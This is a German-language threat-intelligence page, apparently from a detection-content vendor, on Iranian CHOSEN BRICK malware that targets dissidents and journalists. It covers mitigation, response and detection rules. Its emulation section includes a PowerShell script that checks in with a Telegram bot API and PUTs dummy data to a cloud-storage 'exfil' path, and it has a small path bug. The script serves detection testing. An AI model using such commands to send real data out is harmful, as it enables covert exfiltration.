SOC Prime Bias: High

17 Sep 2026 08:26 UTC

Iranische Cyber-Angriffe auf Dissidenten, Aktivisten und Journalisten

Author Photo
SOC Prime Team linkedin icon Folgen
Iranische Cyber-Angriffe auf Dissidenten, Aktivisten und Journalisten
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Staatlich geförderte iranische Akteure nutzen die CHOSEN BRICK-Malware, um Dissidenten, Aktivisten und Journalisten weltweit ins Visier zu nehmen. Die Malware wird durch Social Engineering auf Plattformen wie WhatsApp und Telegram verbreitet, oft als legitime Anwendungen oder Dateien getarnt. Nach der Installation unterstützt CHOSEN BRICK den Datendiebstahl, die Mikrofonaufzeichnung und das Löschen des Systems über Telegram-basierte Befehls- und Kontrollmechanismen.

Untersuchung

Die Untersuchung identifizierte ein wiederkehrendes Muster sozialer Manipulation, gefolgt von der Implementierung von CHOSEN BRICK auf Windows-Systemen. Analysten beobachteten, dass die Malware Telegram-Bots für C2-Kommunikation und Cloud-Speicherdienste für die Datenextraktion nutzt. Die Persistenz wird durch spezifische Registrierungs-Run-Schlüssel hergestellt, während Microsoft Defender-Ausnahmen hinzugefügt werden, um Sicherheitskontrollen zu umgehen.

Abschwächung

Empfohlene Maßnahmen zur Abmilderung umfassen die Verbesserung des Benutzerbewusstseins für Social Engineering-Techniken und das Vermeiden von Software, die durch unerwünschte Anhänge geliefert wird. Organisationen sollten auch eine nachhaltige MFA gegen Phishing durchsetzen, eine Anwendung-Whitelist implementieren und die Antivirensoftware auf dem neuesten Stand halten. Die Überwachung verdächtiger Verbindungen zu Telegram und bekannten Cloud-Speicher-Anbietern kann die Erkennung weiter stärken.

Reaktion

Wenn Aktivitäten von CHOSEN BRICK entdeckt werden, sollten Organisationen mit ihren IT-Dienstleistern zusammenarbeiten, um Endpunktprotokolle auf zugehörige Registrierungsschlüssel und Dateipfade zu überprüfen. Sowohl Unternehmens- als auch persönliche Geräte hochgefährdeter Personen sollten geprüft werden. Sicherheitsteams sollten auch nach den Domains, Dateinamen und anderen technischen Indikatoren suchen, die mit der Kampagne verbunden sind.

Angriffsablauf

Wir aktualisieren diesen Abschnitt noch.

Erkennungen

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)

SOC Prime-Team
16. September 2026

Möglicher Missbrauch von Telegram als Befehls- und Kontrollkanal (über dns_query)

SOC Prime-Team
16. September 2026

Nutzung von CHOSEN BRICK über Telegram und VultrObjects für bösartige Kommunikation [Windows-Netzwerkverbindung]

SOC Prime KI-Regeln
16. September 2026

Erkennung der Persistenz von CHOSEN BRICK über einen Registry Run Key [Windows Registry Event]

SOC Prime KI-Regeln
16. September 2026

Simulationsausführung

  • Angriffserzählung & Befehle: Der Angreifer versucht, Befehl und Kontrolle (C2) zu etablieren und sensible Daten zu exfiltrieren. Um herkömmliche signaturbasierte Antivirenprogramme zu umgehen, nutzen sie legitime Webdienste. Zunächst führt der Angreifer einen Befehl aus, um sich über die Telegram-API mit seinem C2-Server zu ‚melden‘ (api.telegram.org). Anschließend simuliert der Angreifer die Exfiltration einer sensiblen Datei, indem er sie in einem Speicher-Bucket hochlädt, der auf vultrobjects.comgehostet wird. Diese Aktionen werden über standardmäßige Webanfragen durchgeführt, um in legitimen verschlüsselten Webverkehr einzutauchen, in der Hoffnung, die Inspektion zu umgehen und nur erkannt zu werden, wenn bestimmte IoCs bekannt sind.

  • Regressions-Testskript:

    # Simulationsskript: CHOSEN BRICK TTP-Emulation
    # Dieses Skript simuliert C2 über Telegram und Exfiltration über VultrObjects
    
    $C2_Domain = "api.telegram.org"
    $Exfil_Domain = "vultrobjects.com"
    
    Write-Host "[+] Start der Simulation: Emulierung von CHOSEN BRICK TTPs..." -ForegroundColor Cyan
    
    # 1. C2-Check-in simulieren (Telegram API)
    Write-Host "[*] Schritt 1: Simulation des C2-Check-ins nach $C2_Domain" -ForegroundColor Yellow
    try {
        $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue
        Write-Host "[+] C2-Anforderung gesendet." -ForegroundColor Green
    } catch {
        Write-Host "[!] Hinweis: Verbindung fehlgeschlagen (erwartet, wenn kein Internet/Proxy vorhanden), aber Telemetrie sollte trotzdem generiert werden." -ForegroundColor Gray
    }
    
    # 2. Datenexfiltration simulieren (VultrObjects)
    Write-Host "[*] Schritt 2: Simulation der Datenexfiltration nach $Exfil_Domain" -ForegroundColor Yellow
    $dummy_data = "Dies sind hochsensible Informationen, die exfiltriert werden."
    $dummy_file = "$env:TEMPsensitive_data.txt"
    $dummy_data | Out-File -FilePath $dummy_file
    
    try {
        # Simulation einer PUT-Anfrage an einen Cloud-Speicher-Endpunkt
        Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue
        Write-Host "[+] Exfiltrationsanforderung gesendet." -ForegroundColor Green
    } catch {
        Write-Host "[!] Hinweis: Verbindung fehlgeschlagen (erwartet, wenn kein Internet/Proxy vorhanden), aber Telemetrie sollte trotzdem generiert werden." -ForegroundColor Gray
    }
    
    Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Proxy-Logs, die $C2_Domain und $Exfil_Domain betreffen." -ForegroundColor Cyan
  • Bereinigungskommandos:

    # Bereinigungsskript
    $dummy_file = "$env:TEMPsensitive_data.txt"
    if (Test-Path $dummy_file) {
        Remove-Item -Path $dummy_file -Force
        Write-Host "[+] Bereinigung: Dummy-Exfiltrationsdatei entfernt." -ForegroundColor Green
    } else {
        Write-Host "[!] Bereinigung: Dummy-Datei nicht gefunden." -ForegroundColor Yellow
    }